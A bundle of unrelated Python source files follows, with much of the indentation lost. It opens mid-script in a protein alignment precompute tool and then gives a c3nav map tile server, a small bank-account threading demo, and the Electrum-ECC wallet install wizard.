continue
seq_group_tuples = [(k,v) for k,v in seq_group_dict.items()]
run_seq_group_alignments(seq_group_tuples, alignment_runner, args)
def main(args):
# Build the alignment tool runner
alignment_runner = AlignmentRunner(
jackhmmer_binary_path=args.jackhmmer_binary_path,
hhblits_binary_path=args.hhblits_binary_path,
hhsearch_binary_path=args.hhsearch_binary_path,
uniref90_database_path=args.uniref90_database_path,
mgnify_database_path=args.mgnify_database_path,
bfd_database_path=args.bfd_database_path,
uniclust30_database_path=args.uniclust30_database_path,
pdb70_database_path=args.pdb70_database_path,
use_small_bfd=args.bfd_database_path is None,
no_cpus=args.cpus_per_task,
)
files = list(os.listdir(args.input_dir))
# Do some filtering
if(args.mmcif_cache is not None):
with open(args.mmcif_cache, "r") as fp:
cache = json.load(fp)
else:
cache = None
dirs = []
if(cache is not None and args.filter):
dirs = set(os.listdir(args.output_dir))
def prot_is_done(f):
prot_id = os.path.splitext(f)[0]
if(prot_id in cache):
chain_ids = cache[prot_id]["chain_ids"]
for c in chain_ids:
full_name = prot_id + "_" + c
if(not full_name in dirs):
return False
else:
return False
return True
files = [f for f in files if not prot_is_done(f)]
def split_up_arglist(arglist):
# Split up the survivors
if(os.environ.get("SLURM_JOB_NUM_NODES", 0)):
num_nodes = int(os.environ["SLURM_JOB_NUM_NODES"])
if(num_nodes > 1):
node_id = int(os.environ["SLURM_NODEID"])
logging.warning(f"Num nodes: {num_nodes}")
logging.warning(f"Node ID: {node_id}")
arglist = arglist[node_id::num_nodes]
t_arglist = []
for i in range(args.no_tasks):
t_arglist.append(arglist[i::args.no_tasks])
return t_arglist
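    # e.g. with SLURM_JOB_NUM_NODES=2 and --no_tasks=2, node 0 keeps items
    # [0, 2, 4, ...] of the original list and hands its two threads
    # [0, 4, 8, ...] and [2, 6, 10, ...].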
if(cache is not None and "seqs" in next(iter(cache.values()))):
seq_group_dict = {}
for f in files:
prot_id = os.path.splitext(f)[0]
if(prot_id in cache):
prot_cache = cache[prot_id]
chains_seqs = zip(
prot_cache["chain_ids"], prot_cache["seqs"]
)
for chain, seq in chains_seqs:
chain_name = prot_id + "_" + chain
if(chain_name not in dirs):
l = seq_group_dict.setdefault(seq, [])
l.append(chain_name)
func = partial(run_seq_group_alignments,
alignment_runner=alignment_runner,
args=args
)
seq_groups = [(k,v) for k,v in seq_group_dict.items()]
# Sort them by group length so the tasks are approximately balanced
seq_groups = sorted(seq_groups, key=lambda x: len(x[1]))
task_arglist = [[a] for a in split_up_arglist(seq_groups)]
else:
func = partial(parse_and_align,
alignment_runner=alignment_runner,
args=args,
)
task_arglist = [[a] for a in split_up_arglist(files)]
threads = []
for i, task_args in enumerate(task_arglist):
print(f"Started thread {i}...")
t = threading.Thread(target=func, args=task_args)
threads.append(t)
t.start()
for t in threads:
t.join()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"input_dir", type=str,
help="""Path to directory containing mmCIF, FASTA and/or ProteinNet
.core files"""
)
parser.add_argument(
"output_dir", type=str,
help="Directory in which to output alignments"
)
add_data_args(parser)
parser.add_argument(
"--raise_errors", action="store_true", default=False,
help="Whether to crash on parsing errors"
)
parser.add_argument(
"--cpus_per_task", type=int, default=cpu_count(),
help="Number of CPUs to use"
)
parser.add_argument(
"--mmcif_cache", type=str, default=None,
help="Path to mmCIF cache. Used to filter files to be parsed"
)
    parser.add_argument(
        "--no_tasks", type=int, default=1,
        help="Number of parallel alignment threads per node"
    )
    parser.add_argument(
        "--filter", type=lambda x: x.lower() in ("true", "1", "yes"),
        default=True,
        help="Skip proteins whose alignments already exist (argparse's "
             "type=bool treats any non-empty string as True, hence the "
             "explicit parser)"
    )
args = parser.parse_args()
main(args)
|
wsgi.py
|
import base64
import logging
import multiprocessing
import os
import pickle
import re
import threading
import time
from datetime import datetime
from email.utils import formatdate
from io import BytesIO
import requests
import pylibmc
from c3nav.mapdata.utils.cache import CachePackage
from c3nav.mapdata.utils.tiles import (build_access_cache_key, build_base_cache_key, build_tile_etag, get_tile_bounds,
parse_tile_access_cookie)
loglevel = logging.DEBUG if os.environ.get('C3NAV_DEBUG') else os.environ.get('LOGLEVEL', 'INFO')
logging.basicConfig(level=loglevel,
format='[%(asctime)s] [%(process)s] [%(levelname)s] %(name)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S %z')
logger = logging.getLogger('c3nav')
if os.environ.get('C3NAV_LOGFILE'):
    # basicConfig() is a no-op once handlers exist, so attach a file handler
    logging.getLogger().addHandler(logging.FileHandler(os.environ['C3NAV_LOGFILE']))
class TileServer:
def __init__(self):
        self.path_regex = re.compile(r'^/(\d+)/(-?\d+)/(-?\d+)/(-?\d+)\.png$')
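        # e.g. "/0/2/-1/3.png" -> level=0, zoom=2, x=-1, y=3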
self.cookie_regex = re.compile(r'(^| )c3nav_tile_access="?([^;" ]+)"?')
try:
self.upstream_base = os.environ['C3NAV_UPSTREAM_BASE'].strip('/')
except KeyError:
raise Exception('C3NAV_UPSTREAM_BASE needs to be set.')
try:
self.data_dir = os.environ.get('C3NAV_DATA_DIR', 'data')
except KeyError:
raise Exception('C3NAV_DATA_DIR needs to be set.')
if not os.path.exists(self.data_dir):
os.mkdir(self.data_dir)
self.tile_secret = os.environ.get('C3NAV_TILE_SECRET', None)
if not self.tile_secret:
tile_secret_file = None
try:
tile_secret_file = os.environ['C3NAV_TILE_SECRET_FILE']
self.tile_secret = open(tile_secret_file).read().strip()
except KeyError:
raise Exception('C3NAV_TILE_SECRET or C3NAV_TILE_SECRET_FILE need to be set.')
except FileNotFoundError:
raise Exception('The C3NAV_TILE_SECRET_FILE (%s) does not exist.' % tile_secret_file)
self.reload_interval = int(os.environ.get('C3NAV_RELOAD_INTERVAL', 60))
self.http_auth = os.environ.get('C3NAV_HTTP_AUTH', None)
if self.http_auth:
self.http_auth = self.http_auth.split(':', 1)
self.auth_headers = {'X-Tile-Secret': base64.b64encode(self.tile_secret.encode()).decode()}
self.cache_package = None
self.cache_package_etag = None
self.cache_package_filename = None
cache = self.get_cache_client()
wait = 1
while True:
success = self.load_cache_package(cache=cache)
if success:
logger.info('Cache package successfully loaded.')
break
logger.info('Retrying after %s seconds...' % wait)
time.sleep(wait)
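            # exponential backoff: 1, 2, 4, 8, then capped at 10 seconds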
wait = min(10, wait*2)
threading.Thread(target=self.update_cache_package_thread, daemon=True).start()
@staticmethod
def get_cache_client():
return pylibmc.Client(["127.0.0.1"], binary=True, behaviors={"tcp_nodelay": True, "ketama": True})
def update_cache_package_thread(self):
        cache = self.get_cache_client()  # different thread -> different client!
while True:
time.sleep(self.reload_interval)
self.load_cache_package(cache=cache)
def get_date_header(self):
return 'Date', formatdate(timeval=time.time(), localtime=False, usegmt=True)
def load_cache_package(self, cache):
logger.debug('Downloading cache package from upstream...')
try:
headers = self.auth_headers.copy()
if self.cache_package_etag is not None:
headers['If-None-Match'] = self.cache_package_etag
r = requests.get(self.upstream_base+'/map/cache/package.tar.xz', headers=headers, auth=self.http_auth)
if r.status_code == 403:
logger.error('Rejected cache package download with Error 403. Tile secret is probably incorrect.')
return False
if r.status_code == 401:
logger.error('Rejected cache package download with Error 401. You have HTTP Auth active.')
return False
if r.status_code == 304:
if self.cache_package is not None:
logger.debug('Not modified.')
cache['cache_package_filename'] = self.cache_package_filename
return True
logger.error('Unexpected not modified.')
return False
r.raise_for_status()
except Exception as e:
logger.error('Cache package download failed: %s' % e)
return False
        logger.debug('Receiving and loading new cache package...')
try:
self.cache_package = CachePackage.read(BytesIO(r.content))
self.cache_package_etag = r.headers.get('ETag', None)
except Exception as e:
logger.error('Cache package parsing failed: %s' % e)
return False
try:
self.cache_package_filename = os.path.join(
self.data_dir,
datetime.now().strftime('%Y-%m-%d_%H-%M-%S-%f')+'.pickle'
)
with open(self.cache_package_filename, 'wb') as f:
pickle.dump(self.cache_package, f)
cache.set('cache_package_filename', self.cache_package_filename)
except Exception as e:
self.cache_package_etag = None
logger.error('Saving pickled package failed: %s' % e)
return False
return True
def not_found(self, start_response, text):
start_response('404 Not Found', [self.get_date_header(),
('Content-Type', 'text/plain'),
('Content-Length', str(len(text)))])
return [text]
def internal_server_error(self, start_response, text=b'internal server error'):
start_response('500 Internal Server Error', [self.get_date_header(),
('Content-Type', 'text/plain'),
('Content-Length', str(len(text)))])
return [text]
def deliver_tile(self, start_response, etag, data):
start_response('200 OK', [self.get_date_header(),
('Content-Type', 'image/png'),
('Content-Length', str(len(data))),
('Cache-Control', 'no-cache'),
('ETag', etag)])
return [data]
def get_cache_package(self):
try:
cache_package_filename = self.cache.get('cache_package_filename')
except pylibmc.Error as e:
logger.warning('pylibmc error in get_cache_package(): %s' % e)
cache_package_filename = None
if cache_package_filename is None:
logger.warning('cache_package_filename went missing.')
return self.cache_package
if self.cache_package_filename != cache_package_filename:
logger.debug('Loading new cache package in worker.')
self.cache_package_filename = cache_package_filename
with open(self.cache_package_filename, 'rb') as f:
self.cache_package = pickle.load(f)
return self.cache_package
cache_lock = multiprocessing.Lock()
    @property
    def cache(self):
        # A property is a data descriptor, so assigning self.__dict__['cache']
        # would never shadow it; memoize the client explicitly instead of
        # opening a new connection on every access (assumes single-threaded
        # worker processes, matching the per-thread client note above).
        client = self.__dict__.get('_cache_client')
        if client is None:
            client = self.get_cache_client()
            self.__dict__['_cache_client'] = client
        return client
def __call__(self, env, start_response):
path_info = env['PATH_INFO']
match = self.path_regex.match(path_info)
if match is None:
return self.not_found(start_response, b'invalid tile path.')
level, zoom, x, y = match.groups()
zoom = int(zoom)
if not (-2 <= zoom <= 5):
return self.not_found(start_response, b'zoom out of bounds.')
# do this to be thread safe
try:
cache_package = self.get_cache_package()
except Exception as e:
logger.error('get_cache_package() failed: %s' % e)
return self.internal_server_error(start_response)
# check if bounds are valid
x = int(x)
y = int(y)
minx, miny, maxx, maxy = get_tile_bounds(zoom, x, y)
if not cache_package.bounds_valid(minx, miny, maxx, maxy):
return self.not_found(start_response, b'coordinates out of bounds.')
# get level
level = int(level)
level_data = cache_package.levels.get(level)
if level_data is None:
return self.not_found(start_response, b'invalid level.')
# build cache keys
last_update = level_data.history.last_update(minx, miny, maxx, maxy)
base_cache_key = build_base_cache_key(last_update)
# decode access permissions
access_permissions = set()
access_cache_key = '0'
cookie = env.get('HTTP_COOKIE', None)
if cookie:
cookie = self.cookie_regex.search(cookie)
if cookie:
cookie = cookie.group(2)
access_permissions = (parse_tile_access_cookie(cookie, self.tile_secret) &
set(level_data.restrictions[minx:maxx, miny:maxy]))
access_cache_key = build_access_cache_key(access_permissions)
# check browser cache
if_none_match = env.get('HTTP_IF_NONE_MATCH')
tile_etag = build_tile_etag(level, zoom, x, y, base_cache_key, access_cache_key, self.tile_secret)
if if_none_match == tile_etag:
start_response('304 Not Modified', [self.get_date_header(),
('Content-Length', '0'),
('ETag', tile_etag)])
return [b'']
cache_key = path_info+'_'+tile_etag
cached_result = self.cache.get(cache_key)
if cached_result is not None:
return self.deliver_tile(start_response, tile_etag, cached_result)
r = requests.get('%s/map/%d/%d/%d/%d/%s.png' % (self.upstream_base, level, zoom, x, y, access_cache_key),
headers=self.auth_headers, auth=self.http_auth)
if r.status_code == 200 and r.headers['Content-Type'] == 'image/png':
self.cache.set(cache_key, r.content)
return self.deliver_tile(start_response, tile_etag, r.content)
start_response('%d %s' % (r.status_code, r.reason), [
self.get_date_header(),
('Content-Length', str(len(r.content))),
('Content-Type', r.headers.get('Content-Type', 'text/plain'))
])
return [r.content]
application = TileServer()
|
main.py
|
import threading
from bank.account import Account
from bank.actions import transfer_money, charge_bank_fees
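# Both threads mutate jan_account concurrently; the Account/actions helpers
# are expected to serialize balance updates (e.g. with a lock) so the totals
# printed below stay consistent.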
def run_example() -> None:
jan_account = Account(holder="Jan", money_amount=1_000)
alicja_account = Account(holder="Alicja", money_amount=1_000)
print(jan_account)
print(alicja_account)
    transfer_thread = threading.Thread(target=transfer_money, args=(jan_account, alicja_account, 1_000))
    fees_thread = threading.Thread(target=charge_bank_fees, args=(jan_account, 500))
    transfer_thread.start()
    fees_thread.start()
    # join() instead of a fixed sleep: wait exactly until both operations finish
    transfer_thread.join()
    fees_thread.join()
print(jan_account)
print(alicja_account)
if __name__ == "__main__":
run_example()
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage
from electrum.util import UserCancelled, InvalidPassword, WalletFileException
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum.plugin import run_hook
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
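        # drawPie() measures angles in 1/16th of a degree, hence the 16x factors.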
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
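# Decorator for wizard pages: runs the page, handles Back/Cancel via
# GoBack/UserCancelled, and forwards the page's return value(s) to the
# run_next continuation.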
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
        except GoBack:
            if wizard.can_go_back():
                wizard.go_back()
            else:
                wizard.close()
            return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins):
BaseWizard.__init__(self, config, plugins)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum-ECC - ' + _('Install Wizard'))
self.app = app
self.config = config
        # Set for the base class
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
        self.pw_e.setEchoMode(QLineEdit.Password)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-ECC wallet'))
self.temp_storage = WalletStorage(path, manual_upgrades=True)
wallet_folder = os.path.dirname(self.temp_storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.temp_storage = wallet_from_memory.storage
else:
self.temp_storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.temp_storage = None
self.next_button.setEnabled(False)
user_needs_to_enter_password = False
if self.temp_storage:
if not self.temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if self.temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif self.temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
else:
msg = _('Cannot read file')
self.msg_label.setText(msg)
if user_needs_to_enter_password:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.temp_storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
break
if not self.temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
if self.temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.temp_storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
elif self.temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
                    except InvalidPassword:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
if self.temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None)
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
